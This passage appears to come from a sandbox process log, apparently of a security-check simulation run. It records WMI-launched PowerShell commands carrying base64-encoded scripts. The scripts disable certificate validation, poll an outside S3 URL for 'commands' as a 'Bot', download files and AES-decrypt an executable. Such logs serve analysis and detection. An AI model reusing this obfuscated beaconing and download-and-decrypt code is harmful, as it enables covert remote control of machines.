yAC4AUgBlAGEAZABCAHkAdABlAHMAKAAkAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAkAHMAaQB6AGUAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQASQBuAHQAMwAyACgAKQA7AAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAQgB5AHQAZQBzACgAJABzAGkAegBlACkAOwAKAAkACgAJAHIAZQB0AHUAcgBuACAAJABhAGUAcwAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAZQBjAHIAeQBwAHQAVwBpAHQAaABLAGUAeQBkAGEAdABhACgAWwBzAHQAcgBpAG4AZwBdACQARgBpAGwAZQBUAG8ARABlAGMAcgB5AHAAdAAsACAAWwBzAHQAcgBpAG4AZwBdACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAWwBzAHQAcgBpAG4AZwBdACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQApAAoAewAKAAkAJABhAGUAcwAgAD0AIABDAHIAZQBhAHQAZQBBAGUAcwAgACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQAKAAkACQAJAAoACQBEAGUAYwByAHkAcAB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAVABvAEQAZQBjAHIAeQBwAHQAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIAAkAGEAZQBzAAoACQByAGUAdAB1AHIAbgAgADEACgB9AAoAJABpAG4AIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAEEATQAuAGUAeABlACIACgAkAG8AdQB0ACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAEMAUABfAEEATQAuAGUAeABlACIACgAkAGsAZQB5AGQAYQB0AGEAIAA9ACAAIgBFAEEAQQBBAEEARgB1AHgAZwA4ADkAeABIAE0AQgA5AHYAUgBmAHoAWgBxAHYAKwByAFkAYwBnAEEAQQBBAEEAeQA0AGUATgBGADcAWQBLAC8AVwBFAE4AaABNAGwAMwBvAEkASgBZAHYAZwBGAGkAaQBXADMAcABBAFIAQgBuADEAZQAzAHQAWABPAEwAaABRAGgAMAA9ACIACgAKAHIAZQB0AHUAcgBuACAARABlAGMAcgB5AHAAdABXAGkAdABoAEsAZQB5AGQAYQB0AGEAIAAkAGkAbgAgACQAbwB1AHQAIAAkAGsAZQB5AGQAYQB0AGEA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4092 | c:\temp\CP\CP_AM.exe c:\temp\CP\eicar.exe | c:\temp\CP\CP_AM.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 666 | ||||
3644 | PowerShell.exe -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAEwAbwBnACgAWwBzAHQAcgBpAG4AZwBdACQAZABhAHQAYQApAAoAewAKACAAIAAgACAAJABEAGEAdABlAEYAbwByAG0AYQB0ACAAPQAgACIAZABkAE0ATQB5AHkALQBIAEgAbQBtAHMAcwAuAGYAZgBmACIACgAgACAAIAAgACQAbABvAGcARgBpAGwAZQAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXABDAFAAXABDAG0AUwBjAHIAaQBwAHQATABvAGcALgBsAG8AZwAiAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHQAaQBtAGUAUwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAYQB0AGUAVABpAG0AZQBdADoAOgBOAG8AdwAuAFQAbwBTAHQAcgBpAG4AZwAoACQARABhAHQAZQBGAG8AcgBtAGEAdAApAAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AEEAcABwAGUAbgBkAEEAbABsAFQAZQB4AHQAKAAkAGwAbwBnAEYAaQBsAGUALAAgACQAdABpAG0AZQBTAHQAcgAgACsAIAAiACAALQAgACIAIAArACAAJABkAGEAdABhACAAKwAgACIAYABuACIAKQAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAgACAAIAAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABSAGUAcwBwAG8AbgBzAGUAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAkAHIAZQBxAHUAZQBzAHQAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAHIAZQBxAHUAZQBzAHQALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAIAAgACAAIAAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAZQAuAFMAdABhAHQAdQBzACAALQBlAHEAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBTAHQAYQB0AHUAcwBdADoAOgBQAHIAbwB0AG8AYwBvAGwARQByAHIAbwByACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGUALgBSAGUAcwBwAG8AbgBzAGUAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwA7AAoAIAAgACAAIAB9AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAkAFIAZQBxAHUAZQBzAHQAKQAKAHsACgAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAAIgAiADsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AJABoAHQAdABwAFIAZQBzAHAAbwBuAHMAZQAgAD0AIABHAGUAdABSAGUAcwBwAG8AbgBzAGUAIAAkAHIAZQBxAHUAZQBzAHQACgAgACAAIAAgACAAIAAgACAAJABzAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAaAB0AHQAcABSAGUAcwBwAG8AbgBzAGUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAcwB0AHIAZQBhAG0AUgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkACgAgACAAIAAgAH0ACgAgACAAIAAgAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAByAGUAcwB1AGwAdAA7AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZABHAGUAdAAoAFsAcwB0AHIAaQBuAGcAXQAgACQAVQByAGwALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAVQBzAGUAcgBBAGcAZQBuAHQAKQAKAHsACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABVAHIAbAApAAoAIAAgACAAIABpAGYAIAAoACQAVQBzAGUAcgBBAGcAZQBuAHQALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAFUAcwBlAHIAQQBnAGUAbgB0ACAAPQAgACQAVQBzAGUAcgBBAGcAZQBuAHQACgAgACAAIAAgAH0ACgAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAE0AZQB0AGgAbwBkACAAPQAgACIARwBFAFQAIgAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgAFIAZQBhAGQAUgBlAHMAcABvAG4AcwBlACAAJAByAGUAcQB1AGUAcwB0AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBvAG4AdABhAGkAbgBzACgAWwBzAHQAcgBpAG4AZwBdACQARABhAHQAYQAsACAAWwBzAHQAcgBpAG4AZwBdACQAUwB1AGIAcwB0AHIAaQBuAGcAKQAKAHsACgAgACAAIAAgACQAaQBuAGQAZQB4ACAAPQAgACQARABhAHQAYQAuAEkAbgBkAGUAeABPAGYAKAAkAFMAdQBiAHMAdAByAGkAbgBnACwAIABbAFMAeQBzAHQAZQBtAC4AUwB0AHIAaQBuAGcAQwBvAG0AcABhAHIAaQBzAG8AbgBdADoAOgBPAHIAZABpAG4AYQBsAEkAZwBuAG8AcgBlAEMAYQBzAGUAKQA7AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaQBuAGQAZQB4ACAALQBnAGUAIAAwADsACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABDAGgAZQBjAGsAUgBlAHMAcABvAG4AcwBlACgAWwBzAHQAcgBpAG4AZwBdACQARABhAHQAYQApAAoAewAKACAAIAAgACAAaQBmACAAKAAkAEQAYQB0AGEALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIAQgBvAHQALgAgAEUAbQBwAHQAeQAgAGQAYQB0AGEAIgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgADEACgAgACAAIAAgAH0ACgAKACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABjAGgAZQBjAGsAUABvAGkAbgB0AFMAaQBnAG4AYQB0AHUAcgBlACAAPQAgACIAYwBoAGUAYwBrACAAcABvAGkAbgB0ACIACgAgACAAIAAgAGkAZgAgACgAQwBvAG4AdABhAGkAbgBzACAAJABEAGEAdABhACAAJABjAGgAZQBjAGsAUABvAGkAbgB0AFMAaQBnAG4AYQB0AHUAcgBlACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBCAG8AdAAuACAAQwBvAG4AdABhAGkAbgBzACAAQwBQACIACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAyAAoAIAAgACAAIAB9AAoACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAGUAeABwAGUAYwB0AGUAZAAgAD0AIAAiAHQAZQBzAHQAIgAKAAoAIAAgACAAIABpAGYAIAAoACQARABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAkAGUAeABwAGUAYwB0AGUAZAAuAEwAZQBuAGcAdABoACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBCAG8AdAAuACAATABlAG4AZwB0AGgAIABlAHEAbAAiAAoAIAAgACAAIAB9AAoACgAgACAAIAAgAGkAZgAgACgAJABlAHgAcABlAGMAdABlAGQAIAAtAGUAcQAgACQARABhAHQAYQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIAQgBvAHQALgAgAEQAYQB0AGEAIABlAHEAbAAiAAoAIAAgACAAIAB9AAoACgAgACAAIAAgAGkAZgAgACgAJABEAGEAdABhAC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgACQAZQB4AHAAZQBjAHQAZQBkAC4ATABlAG4AZwB0AGgAIAAtAGEAbgBkACAAJABlAHgAcABlAGMAdABlAGQAIAAtAGUAcQAgACQARABhAHQAYQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAANgA2ADYACgAgACAAIAAgAH0ACgAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAzAAoAfQAKAAoAJAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwAzAC4AdQBzAC0AZQBhAHMAdAAtADIALgBhAG0AYQB6AG8AbgBhAHcAcwAuAGMAbwBtAC8AYwBwAGMAaABlAGMAawBtAGUAZgBpAGwAZQBzAC8AZgBpAGwAZQBzAC8AYwBoAGUAYwBrAG0AZQA/AGMAbwBtAG0AYQBuAGQAcwAmAEkAZABlAG4AdABpAHQAeQA9ADAAMQAyADMANAA1ADYANwA4ADkAQQBCACIACgAkAG8AdQB0AHAAdQB0AEYAaQBsAGUAIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAYQBiAF8AcgBlAHMAcABvAG4AcwBlAC4AdAB4AHQAIgAKACQAdQBzAGUAcgBBAGcAZQBuAHQAIAA9ACAAIgBHAGUAYwBrAGEAUwBlAGsAYQAiAAoACgBXAHIAaQB0AGUATABvAGcAIAAiAEIAbwB0AC4AIABTAHQAYQByAHQAZQBkACIACgBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9AAoAVwByAGkAdABlAEwAbwBnACAAIgBCAG8AdAAuACAAUwBlAG4AZABpAG4AZwAgAGcAZQB0ACIACgBbAHMAdAByAGkAbgBnAF0AJAByAGUAcwBHAGUAdAAgAD0AIABTAGUAbgBkAEcAZQB0ACAAJAB1AHIAbAAgACQAdQBzAGUAcgBBAGcAZQBuAHQACgAkAHIAZQBzACAAPQAgAEMAaABlAGMAawBSAGUAcwBwAG8AbgBzAGUAIAAkAHIAZQBzAEcAZQB0AAoAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQAKAAkAG8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAcgBlAHMARwBlAHQAKQAKAFcAcgBpAHQAZQBMAG8AZwAgACIAQgBvAHQALgAgAEQAbwBuAGUAIgAKAGUAeABpAHQAIAAkAHIAZQBzAA== | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 666 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3872 | PowerShell.exe -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAEwAbwBnACgAWwBzAHQAcgBpAG4AZwBdACQAZABhAHQAYQApAAoAewAKACAAIAAgACAAJABEAGEAdABlAEYAbwByAG0AYQB0ACAAPQAgACIAZABkAE0ATQB5AHkALQBIAEgAbQBtAHMAcwAuAGYAZgBmACIACgAgACAAIAAgACQAbABvAGcARgBpAGwAZQAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXABDAFAAXABDAG0AUwBjAHIAaQBwAHQATABvAGcALgBsAG8AZwAiAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHQAaQBtAGUAUwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAYQB0AGUAVABpAG0AZQBdADoAOgBOAG8AdwAuAFQAbwBTAHQAcgBpAG4AZwAoACQARABhAHQAZQBGAG8AcgBtAGEAdAApAAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AEEAcABwAGUAbgBkAEEAbABsAFQAZQB4AHQAKAAkAGwAbwBnAEYAaQBsAGUALAAgACQAdABpAG0AZQBTAHQAcgAgACsAIAAiACAALQAgACIAIAArACAAJABkAGEAdABhACAAKwAgACIAYABuACIAKQAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAgACAAIAAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABSAGUAcwBwAG8AbgBzAGUAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAkAHIAZQBxAHUAZQBzAHQAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAHIAZQBxAHUAZQBzAHQALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAIAAgACAAIAAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAZQAuAFMAdABhAHQAdQBzACAALQBlAHEAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBTAHQAYQB0AHUAcwBdADoAOgBQAHIAbwB0AG8AYwBvAGwARQByAHIAbwByACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGUALgBSAGUAcwBwAG8AbgBzAGUAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARwBlAHQAUgBlAHMAcABvAG4AcwBlACAAdQBuAGUAeABwAGUAdABlAGQAIABlAHgAYwBlAHAAdABpAG8AbgAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwA7AAoAIAAgACAAIAB9AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBvAHAAeQBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACkACgB7AAoAIAAgACAAIAAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAgACAAIAAgAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAgACAAIAAgACAAIAAgACAAdwBoAGkAbABlACAAKAAkAGIAeQB0AGUAcwBSAGUAYQBkACAALQBuAGUAIAAwACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEMAbwBwAHkAUwB0AHIAZQBhAG0AIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABSAGUAYQBkAFIAZQBzAHAAbwBuAHMAZQAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACQAUgBlAHEAdQBlAHMAdAAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAF0AJABPAHUAdABwAHUAdAApAAoAewAKACAAIAAgACAAdAByAHkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlACAAPQAgAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAgACQAcgBlAHEAdQBlAHMAdAAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIAAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACAAIAAgACAAIAAgACAAIABDAG8AcAB5AFMAdAByAGUAYQBtACAAJABpAG4AcAB1AHQAIAAkAE8AdQB0AHAAdQB0AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABlAC4AUwB0AGEAdAB1AHMACgAgACAAIAAgAH0ACgAgACAAIAAgAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAA2ADYANgAKACAAIAAgACAAfQAKACAACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAMAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AFAAcgBvAHgAeQAoAFsAcwB0AHIAaQBuAGcAXQAgACQAVQByAGwAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBVAHIAaQBbAF0AXQAkAHUAcgBpAHMAIAA9ACAAQAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAJABVAHIAbAApACkACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASQBXAGUAYgBQAHIAbwB4AHkAXQAgACQAaQBQAHIAbwB4AHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAkAGkAUAByAG8AeAB5ACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHUAcgBpACAAaQBuACAAJAB1AHIAaQBzACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcAByAG8AeAB5AFUAcgBpACAAPQAgACQAaQBQAHIAbwB4AHkALgBHAGUAdABQAHIAbwB4AHkAKAAkAHUAcgBpACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAVQByAGkAIAAtAG4AZQAgACQAdQByAGkAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABpAFAAcgBvAHgAeQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAfQAKAAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwBHAGUAdAAoAFsAcwB0AHIAaQBuAGcAXQAkAFUAcgBsACwAIABbAHMAdAByAGkAbgBnAF0AJABPAHUAdABwAHUAdABGAGkAbABlACkACgB7AAoAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEQAbwBHAGUAdAAgAHMAdABhAHIAdABlAGQAIgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AJAByAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAFUAcgBsACkACgAgACAAIAAgACQAcAByAG8AeAB5ACAAPQAgAEcAZQB0AFAAcgBvAHgAeQAgACQAVQByAGwACgAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQALgBQAHIAbwB4AHkAIAA9ACAAJABwAHIAbwB4AHkACgAgACAAIAAgAH0ACgAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAE0AZQB0AGgAbwBkACAAPQAgACIARwBFAFQAIgAKAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAgACAAIAAgAGkAZgAgACgAIQAkAG8AdQB0AHAA